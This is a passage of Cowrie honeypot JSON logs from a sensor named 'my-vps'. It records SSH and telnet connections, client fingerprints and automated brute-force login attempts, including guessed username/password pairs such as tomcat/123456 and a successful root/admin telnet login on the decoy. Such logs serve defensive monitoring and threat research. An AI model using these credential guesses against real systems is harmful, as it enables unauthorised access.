cCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:47:33.762905Z","src_ip":"185.93.89.7","session":"572a545a9bb0"}
{"eventid":"cowrie.login.failed","username":"index","password":"159357","message":"login attempt [index/159357] failed","sensor":"my-vps","timestamp":"2025-08-28T09:47:33.818915Z","src_ip":"185.93.89.7","session":"572a545a9bb0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:47:34.841757Z","src_ip":"185.93.89.7","session":"572a545a9bb0"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":40714,"dst_ip":"1.2.3.4","dst_port":22,"session":"c66b5cfb0958","protocol":"ssh","message":"New connection: 51.79.164.132:40714 (1.2.3.4:22) [session: c66b5cfb0958]","sensor":"my-vps","timestamp":"2025-08-28T09:47:53.107551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:47:53.321327Z","src_ip":"51.79.164.132","session":"c66b5cfb0958"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:47:53.322192Z","src_ip":"51.79.164.132","session":"c66b5cfb0958"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:47:56.509856Z","src_ip":"51.79.164.132","session":"c66b5cfb0958"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:47:57.959018Z","src_ip":"51.79.164.132","session":"c66b5cfb0958"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":47550,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b82ae135ef6","protocol":"ssh","message":"New connection: 185.93.89.7:47550 (1.2.3.4:22) [session: 2b82ae135ef6]","sensor":"my-vps","timestamp":"2025-08-28T09:47:58.877349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:47:58.879098Z","src_ip":"185.93.89.7","session":"2b82ae135ef6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:47:58.896832Z","src_ip":"185.93.89.7","session":"2b82ae135ef6"}
{"eventid":"cowrie.login.failed","username":"index","password":"101010","message":"login attempt [index/101010] failed","sensor":"my-vps","timestamp":"2025-08-28T09:47:58.934609Z","src_ip":"185.93.89.7","session":"2b82ae135ef6"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:47:59.986163Z","src_ip":"185.93.89.7","session":"2b82ae135ef6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:48:15.850855Z","src_ip":"212.227.125.160","session":"b7e6a94a05a0"}
{"eventid":"cowrie.session.closed","duration":180.1202347278595,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:48:15.854874Z","src_ip":"212.227.125.160","session":"b7e6a94a05a0"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":46202,"dst_ip":"1.2.3.4","dst_port":22,"session":"8594a1f2ca71","protocol":"ssh","message":"New connection: 51.79.164.132:46202 (1.2.3.4:22) [session: 8594a1f2ca71]","sensor":"my-vps","timestamp":"2025-08-28T09:48:19.438073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:48:20.052844Z","src_ip":"51.79.164.132","session":"8594a1f2ca71"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:48:20.053604Z","src_ip":"51.79.164.132","session":"8594a1f2ca71"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"123456","message":"login attempt [elsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:48:22.753863Z","src_ip":"51.79.164.132","session":"8594a1f2ca71"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":45968,"dst_ip":"1.2.3.4","dst_port":22,"session":"b08900575f52","protocol":"ssh","message":"New connection: 185.93.89.7:45968 (1.2.3.4:22) [session: b08900575f52]","sensor":"my-vps","timestamp":"2025-08-28T09:48:23.509586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:48:23.519155Z","src_ip":"185.93.89.7","session":"b08900575f52"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:48:23.532475Z","src_ip":"185.93.89.7","session":"b08900575f52"}
{"eventid":"cowrie.login.failed","username":"index","password":"1111111","message":"login attempt [index/1111111] failed","sensor":"my-vps","timestamp":"2025-08-28T09:48:23.585838Z","src_ip":"185.93.89.7","session":"b08900575f52"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:48:23.994367Z","src_ip":"51.79.164.132","session":"8594a1f2ca71"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:48:24.695912Z","src_ip":"185.93.89.7","session":"b08900575f52"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":48004,"dst_ip":"1.2.3.4","dst_port":23,"session":"66e848b16f16","protocol":"telnet","message":"New connection: 79.124.8.120:48004 (1.2.3.4:23) [session: 66e848b16f16]","sensor":"my-vps","timestamp":"2025-08-28T09:48:25.697844Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:48:25.737916Z","src_ip":"79.124.8.120","session":"66e848b16f16"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:48:26.224141Z","src_ip":"79.124.8.120","session":"66e848b16f16"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":6758,"dst_ip":"1.2.3.4","dst_port":22,"session":"d476d48b6b8d","protocol":"ssh","message":"New connection: 80.94.95.15:6758 (1.2.3.4:22) [session: d476d48b6b8d]","sensor":"my-vps","timestamp":"2025-08-28T09:48:31.054241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:48:31.054938Z","src_ip":"80.94.95.15","session":"d476d48b6b8d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:48:31.107203Z","src_ip":"80.94.95.15","session":"d476d48b6b8d"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T09:48:31.405253Z","src_ip":"80.94.95.15","session":"d476d48b6b8d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:48:32.463777Z","src_ip":"80.94.95.15","session":"d476d48b6b8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42699,"dst_ip":"1.2.3.4","dst_port":23,"session":"5170ce572447","protocol":"telnet","message":"New connection: 212.227.235.229:42699 (1.2.3.4:23) [session: 5170ce572447]","sensor":"my-vps","timestamp":"2025-08-28T09:48:34.884587Z"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56394,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef504e79a471","protocol":"ssh","message":"New connection: 51.79.164.132:56394 (1.2.3.4:22) [session: ef504e79a471]","sensor":"my-vps","timestamp":"2025-08-28T09:48:45.367651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:48:45.883438Z","src_ip":"51.79.164.132","session":"ef504e79a471"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:48:45.884193Z","src_ip":"51.79.164.132","session":"ef504e79a471"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":48802,"dst_ip":"1.2.3.4","dst_port":22,"session":"93bcd3e16612","protocol":"ssh","message":"New connection: 185.93.89.7:48802 (1.2.3.4:22) [session: 93bcd3e16612]","sensor":"my-vps","timestamp":"2025-08-28T09:48:47.191401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:48:47.193033Z","src_ip":"185.93.89.7","session":"93bcd3e16612"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:48:47.209371Z","src_ip":"185.93.89.7","session":"93bcd3e16612"}
{"eventid":"cowrie.login.failed","username":"index","password":"11223344","message":"login attempt [index/11223344] failed","sensor":"my-vps","timestamp":"2025-08-28T09:48:47.263231Z","src_ip":"185.93.89.7","session":"93bcd3e16612"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:48:48.284741Z","src_ip":"185.93.89.7","session":"93bcd3e16612"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:48:48.777914Z","src_ip":"51.79.164.132","session":"ef504e79a471"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:48:50.087874Z","src_ip":"51.79.164.132","session":"ef504e79a471"}
{"eventid":"cowrie.session.closed","duration":31.477498054504395,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:49:06.362012Z","src_ip":"212.227.235.229","session":"5170ce572447"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":48354,"dst_ip":"1.2.3.4","dst_port":22,"session":"207795d01ae5","protocol":"ssh","message":"New connection: 51.79.164.132:48354 (1.2.3.4:22) [session: 207795d01ae5]","sensor":"my-vps","timestamp":"2025-08-28T09:49:11.867362Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":48590,"dst_ip":"1.2.3.4","dst_port":22,"session":"c23226f87eaa","protocol":"ssh","message":"New connection: 185.93.89.7:48590 (1.2.3.4:22) [session: c23226f87eaa]","sensor":"my-vps","timestamp":"2025-08-28T09:49:11.931258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:49:11.932153Z","src_ip":"185.93.89.7","session":"c23226f87eaa"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:49:11.950926Z","src_ip":"185.93.89.7","session":"c23226f87eaa"}
{"eventid":"cowrie.login.failed","username":"index","password":"asdf","message":"login attempt [index/asdf] failed","sensor":"my-vps","timestamp":"2025-08-28T09:49:12.012121Z","src_ip":"185.93.89.7","session":"c23226f87eaa"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:49:12.049452Z","src_ip":"51.79.164.132","session":"207795d01ae5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp38